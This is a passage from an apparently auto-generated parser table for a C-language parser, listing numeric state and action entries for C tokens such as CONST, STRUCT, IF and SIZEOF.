,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[42,42,-60,-62,-63,-64,-65,-66,42,42,-67,-68,-52,-309,-309,-309,-116,-93,42,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,42,-84,42,42,42,-89,-90,-91,-92,-83,-69,42,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,42,-70,42,-85,42,42,42,-30,-167,42,42,42,-135,-142,-308,42,-145,-146,-130,42,42,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,42,-71,-35,-36,42,42,-154,42,-137,42,-139,-134,-143,-128,-129,-131,-202,-201,42,-218,42,-78,-80,42,-214,-215,-217,42,42,42,-31,-34,42,42,-155,-156,-136,-138,-144,-203,-205,42,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'UNSIGNED':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[43,43,-60,-62,-63,-64,-65,-66,43,43,-67,-68,-52,-309,-309,-309,-116,-93,43,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,43,-84,43,43,43,-89,-90,-91,-92,-83,-69,43,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,43,-70,43,-85,43,43,43,-30,-167,43,43,43,-135,-142,-308,43,-145,-146,-130,43,43,-200,-198,-199,-72,-73,
-74,-75,-76,-77,-78,43,-71,-35,-36,43,43,-154,43,-137,43,-139,-134,-143,-128,-129,-131,-202,-201,43,-218,43,-78,-80,43,-214,-215,-217,43,43,43,-31,-34,43,43,-155,-156,-136,-138,-144,-203,-205,43,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'__INT128':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[44,44,-60,-62,-63,-64,-65,-66,44,44,-67,-68,-52,-309,-309,-309,-116,-93,44,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,44,-84,44,44,44,-89,-90,-91,-92,-83,-69,44,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,44,-70,44,-85,44,44,44,-30,-167,44,44,44,-135,-142,-308,44,-145,-146,-130,44,44,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,44,-71,-35,-36,44,44,-154,44,-137,44,-139,-134,-143,-128,-129,-131,-202,-201,44,-218,44,-78,-80,44,-214,-215,-217,44,44,44,-31,-34,44,44,-155,-156,-136,-138,-144,-203,-205,44,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'CONST':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,
375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[45,45,-60,-62,-63,-64,-65,-66,45,45,-67,-68,-52,45,45,45,-116,-93,-29,-97,45,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,45,-84,45,45,-89,-90,-91,-92,-83,-69,45,45,-53,-94,45,-166,-152,-153,-307,-132,-133,45,-70,45,-85,45,45,45,45,45,-30,-167,45,45,45,-135,-142,-308,45,-145,-146,-130,45,45,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,45,-71,45,45,-35,-36,45,45,-154,45,-137,45,-139,-134,-143,-128,-129,-131,-202,-201,45,-218,45,-78,-80,45,-214,-215,-217,45,45,45,-31,-34,45,45,45,-155,-156,-136,-138,-144,-203,-205,45,-79,-213,-216,-32,-33,45,45,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'RESTRICT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[46,46,-60,-62,-63,-64,-65,-66,46,46,-67,-68,-52,46,46,46,-116,-93,-29,-97,46,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,46,-84,46,46,-89,-90,-91,-92,-83,-69,46,46,-53,-94,46,-166,-152,-153,-307,-132,-133,46,-70,46,-85,46,46,46,46,46,-30,-167,46,46,46,-135,-142,-308,46,-145,-146,-130,46,46,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,46,-71,46,46,-35,-36,46,46,-154,46,-137,46,-139,-134,-143,-128,-129,-131,-202,-201,46,-218,46,-78,-80,46,-214,-215,-217,46,46,46,-31,-34,46,46,46,-155,-156,-136,-138,-144,-203,-205,46,-79,-213,-216,-32,-33,46,46,-204,-206,-80,-208,-209,-207,-
210,-212,-211,]),'VOLATILE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[47,47,-60,-62,-63,-64,-65,-66,47,47,-67,-68,-52,47,47,47,-116,-93,-29,-97,47,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,47,-84,47,47,-89,-90,-91,-92,-83,-69,47,47,-53,-94,47,-166,-152,-153,-307,-132,-133,47,-70,47,-85,47,47,47,47,47,-30,-167,47,47,47,-135,-142,-308,47,-145,-146,-130,47,47,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,47,-71,47,47,-35,-36,47,47,-154,47,-137,47,-139,-134,-143,-128,-129,-131,-202,-201,47,-218,47,-78,-80,47,-214,-215,-217,47,47,47,-31,-34,47,47,47,-155,-156,-136,-138,-144,-203,-205,47,-79,-213,-216,-32,-33,47,47,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'AUTO':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[48,48,-60,-62,-63,-64,-65,-66,48,48,-67,-68,-52,48,48,48,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,48,-84,48,48,-89,-90,-91,-92,-83,-69,48,-53,-94,-152,-153,-307,-132,-133,-70,48,-85,48,4
8,-30,-135,-308,48,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,48,48,-154,-137,-139,-134,-202,-201,-218,-78,-80,48,-214,-215,-217,-31,-34,48,48,-155,-156,-136,-138,-203,-205,48,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'REGISTER':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[49,49,-60,-62,-63,-64,-65,-66,49,49,-67,-68,-52,49,49,49,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,49,-84,49,49,-89,-90,-91,-92,-83,-69,49,-53,-94,-152,-153,-307,-132,-133,-70,49,-85,49,49,-30,-135,-308,49,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,49,49,-154,-137,-139,-134,-202,-201,-218,-78,-80,49,-214,-215,-217,-31,-34,49,49,-155,-156,-136,-138,-203,-205,49,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'STATIC':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,97,98,99,101,102,103,105,106,107,114,115,118,126,131,133,142,144,152,153,154,155,156,157,158,159,160,161,162,210,218,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,360,361,370,371,372,375,376,381,384,390,395,398,399,442,443,446,458,490,491,493,494,518,520,526,528,],[25,25,-60,-62,-63,-64,-65,-66,25,25,-67,-68,-52,25,25,25,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,25,-84,25,25,-89,-90,-91,-92,-83,-69,117,25,-53,-94,-166,-152,-153,-307,-132,-133,-70,
25,-85,217,25,226,25,-30,-167,-135,-308,25,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,348,-35,-36,25,25,-154,-137,-139,-134,-202,-201,-218,-78,-80,25,-214,-215,-217,-31,-34,445,25,25,-155,-156,-136,-138,-203,-205,25,-79,-213,-216,-32,-33,484,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'EXTERN':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[50,50,-60,-62,-63,-64,-65,-66,50,50,-67,-68,-52,50,50,50,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,50,-84,50,50,-89,-90,-91,-92,-83,-69,50,-53,-94,-152,-153,-307,-132,-133,-70,50,-85,50,50,-30,-135,-308,50,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,50,50,-154,-137,-139,-134,-202,-201,-218,-78,-80,50,-214,-215,-217,-31,-34,50,50,-155,-156,-136,-138,-203,-205,50,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'TYPEDEF':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[51,51,-60,-62,-63,-64,-65,-66,51,51,-67,-68,-52,51,51,51,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,51,-84,51,51,-89,-90,-91,-92,-83,-69,51,-53,-94,-152,-153,-307,-132,-133,-70,51,-
85,51,51,-30,-135,-308,51,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,51,51,-154,-137,-139,-134,-202,-201,-218,-78,-80,51,-214,-215,-217,-31,-34,51,51,-155,-156,-136,-138,-203,-205,51,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'INLINE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,80,81,87,98,99,101,102,103,105,106,107,115,126,131,142,144,152,153,154,155,156,157,158,159,160,161,162,210,227,228,229,238,246,250,252,253,264,265,273,282,283,284,286,287,289,351,352,361,370,371,372,375,376,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[52,52,-60,-62,-63,-64,-65,-66,52,52,-67,-68,-52,52,52,52,-116,-93,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,52,-84,52,52,-89,-90,-91,-92,-83,-69,52,-53,-94,-152,-153,-307,-132,-133,-70,52,-85,52,52,-30,-135,-308,52,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-71,-35,-36,52,52,-154,-137,-139,-134,-202,-201,-218,-78,-80,52,-214,-215,-217,-31,-34,52,52,-155,-156,-136,-138,-203,-205,52,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'STRUCT':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[53,53,-60,-62,-63,-64,-65,-66,53,-67,-68,-52,-309,-309,-309,53,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,53,-84,53,53,-83,-69,53,-53,-86,-9,-10,-87,-88,-166,-307,53,-70,53,-85,53,53,-30,-167,53,53,53,-142,-308,-145,-146,53,53,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,53,-71,-35,-36,53,53,53,53,-143,-202,-201,53,-218,-78,-80,5
3,-214,-215,-217,53,53,53,-31,-34,53,53,-144,-203,-205,53,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'UNION':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[54,54,-60,-62,-63,-64,-65,-66,54,-67,-68,-52,-309,-309,-309,54,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,54,-84,54,54,-83,-69,54,-53,-86,-9,-10,-87,-88,-166,-307,54,-70,54,-85,54,54,-30,-167,54,54,54,-142,-308,-145,-146,54,54,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,54,-71,-35,-36,54,54,54,54,-143,-202,-201,54,-218,-78,-80,54,-214,-215,-217,54,54,54,-31,-34,54,54,-144,-203,-205,54,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'LBRACE':([10,14,15,23,31,32,53,54,56,57,58,59,62,77,78,81,98,99,101,102,103,106,107,109,113,130,131,144,152,153,154,155,156,157,158,159,160,161,162,172,215,227,228,264,265,267,272,273,282,283,286,287,289,338,339,340,351,352,381,382,384,386,395,398,399,432,434,442,443,458,459,460,461,463,464,472,473,476,477,490,491,493,494,507,509,518,520,522,525,526,528,],[-309,-68,-52,-29,101,101,-140,-141,101,-7,-8,-84,-309,-83,-69,-53,101,101,-307,101,101,101,-85,101,101,101,-30,-308,101,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,101,-309,-35,-36,-202,-201,101,101,-218,101,-80,-214,-215,-217,-11,101,-12,-31,-34,-203,101,-205,101,-79,-213,-216,-309,-182,-32,-33,-204,101,101,-309,101,101,101,101,101,-11,-206,-80,-208,-209,101,-309,-207,-210,101,101,-212,-211,]),'RBRACE':([14,77,78,101,104,106,127,136,137,138,139,140,141,143,144,146,147,150,151,152,153,154,155,156,157,158,159,160,161,162,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,214,215,244,245,247,249,251,254
,264,265,269,270,273,282,283,286,287,289,325,326,327,329,330,331,333,334,336,337,338,373,374,377,381,384,387,395,398,399,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,431,432,433,458,462,469,470,473,475,490,491,492,493,494,498,502,508,509,513,518,519,520,526,528,],[-68,-83,-69,-307,144,-309,-294,144,-157,-160,144,144,144,-142,-308,-145,-146,144,-5,-6,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-177,-309,144,144,-158,144,144,-143,-202,-201,-235,-257,-218,-78,-80,-214,-215,-217,-279,-280,-260,-261,-262,-263,-304,-306,144,-22,-21,-159,-161,-144,-203,-205,-287,-79,-213,-216,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-178,144,-180,-204,-258,-272,-273,-264,-179,-206,-80,144,-208,-209,-237,-181,-281,144,-288,-207,-282,-210,-212,-211,]),'CASE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,164,-308,164,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,164,-202,-201,164,164,-218,164,-80,-214,-215,-217,-203,164,-205,-79,-213,-216,-204,164,164,164,-206,-80,-208,-209,164,-207,-210,164,164,-212,-211,]),'DEFAULT':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,165,-308,165,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,165,-202,-201,165,165,-218,165,-80,-214,-215,-217,-203,165,-205,-79,-213,-216,-204,165,165,165,-206,-80,-208,-209,165,-207,-210,165,165,-212,-211,]),'IF':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,51
8,520,522,525,526,528,],[-68,-83,-69,-307,167,-308,167,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,167,-202,-201,167,167,-218,167,-80,-214,-215,-217,-203,167,-205,-79,-213,-216,-204,167,167,167,-206,-80,-208,-209,167,-207,-210,167,167,-212,-211,]),'SWITCH':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,170,-308,170,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,170,-202,-201,170,170,-218,170,-80,-214,-215,-217,-203,170,-205,-79,-213,-216,-204,170,170,170,-206,-80,-208,-209,170,-207,-210,170,170,-212,-211,]),'WHILE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,281,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,171,-308,171,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,171,-202,-201,171,171,-218,394,171,-80,-214,-215,-217,-203,171,-205,-79,-213,-216,-204,171,171,171,-206,-80,-208,-209,171,-207,-210,171,171,-212,-211,]),'DO':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,172,-308,172,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,172,-202,-201,172,172,-218,172,-80,-214,-215,-217,-203,172,-205,-79,-213,-216,-204,172,172,172,-206,-80,-208,-209,172,-207,-210,172,172,-212,-211,]),'FOR':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,173,-308,173,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,173,-202,-201,173,173,-218,173,-80,-214,-215,-217,-203,173,-205,-79,-213,-216,-204,173,173,173,-206,-80,-208,-209,173,-207,-210,173,173,-212,-211,]),'GOTO':([14,77,78,101,106,144,152,153
,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,174,-308,174,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,174,-202,-201,174,174,-218,174,-80,-214,-215,-217,-203,174,-205,-79,-213,-216,-204,174,174,174,-206,-80,-208,-209,174,-207,-210,174,174,-212,-211,]),'BREAK':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,175,-308,175,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,175,-202,-201,175,175,-218,175,-80,-214,-215,-217,-203,175,-205,-79,-213,-216,-204,175,175,175,-206,-80,-208,-209,175,-207,-210,175,175,-212,-211,]),'CONTINUE':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,176,-308,176,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,176,-202,-201,176,176,-218,176,-80,-214,-215,-217,-203,176,-205,-79,-213,-216,-204,176,176,176,-206,-80,-208,-209,176,-207,-210,176,176,-212,-211,]),'RETURN':([14,77,78,101,106,144,152,153,154,155,156,157,158,159,160,161,162,172,264,265,267,272,273,282,283,286,287,289,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[-68,-83,-69,-307,177,-308,177,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,177,-202,-201,177,177,-218,177,-80,-214,-215,-217,-203,177,-205,-79,-213,-216,-204,177,177,177,-206,-80,-208,-209,177,-207,-210,177,177,-212,-211,]),'PLUSPLUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274
,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,469,470,471,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,183,183,-309,183,-309,-28,-294,183,-167,-308,183,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,183,183,183,183,325,183,183,183,183,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,183,-309,-28,-266,183,183,183,183,183,-202,-201,183,183,183,-218,183,183,183,183,183,-80,183,-214,-215,-217,183,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,183,-279,-280,183,183,-304,-306,-11,183,-12,183,-266,183,183,-309,-266,183,183,-203,183,-205,183,-287,-79,183,-213,-216,-274,-275,-276,-277,-278,-309,-182,183,-309,-28,-266,-204,183,183,-309,183,183,183,183,183,-272,-273,183,183,-11,-266,183,183,-206,-80,-208,-209,183,183,-281,-309,183,-288,183,-207,-282,-210,183,183,-212,-211,]),'MINUSMINUS':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,127,130,133,144,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,387,395,397,398,399,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,463,464,465
,466,468,469,470,471,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,184,184,-309,184,-309,-28,-294,184,-167,-308,184,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,184,184,184,184,326,184,184,184,184,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,184,-309,-28,-266,184,184,184,184,184,-202,-201,184,184,184,-218,184,184,184,184,184,-80,184,-214,-215,-217,184,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,184,-279,-280,184,184,-304,-306,-11,184,-12,184,-266,184,184,-309,-266,184,184,-203,184,-205,184,-287,-79,184,-213,-216,-274,-275,-276,-277,-278,-309,-182,184,-309,-28,-266,-204,184,184,-309,184,184,184,184,184,-272,-273,184,184,-11,-266,184,184,-206,-80,-208,-209,184,184,-281,-309,184,-288,184,-207,-282,-210,184,184,-212,-211,]),'SIZEOF':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,1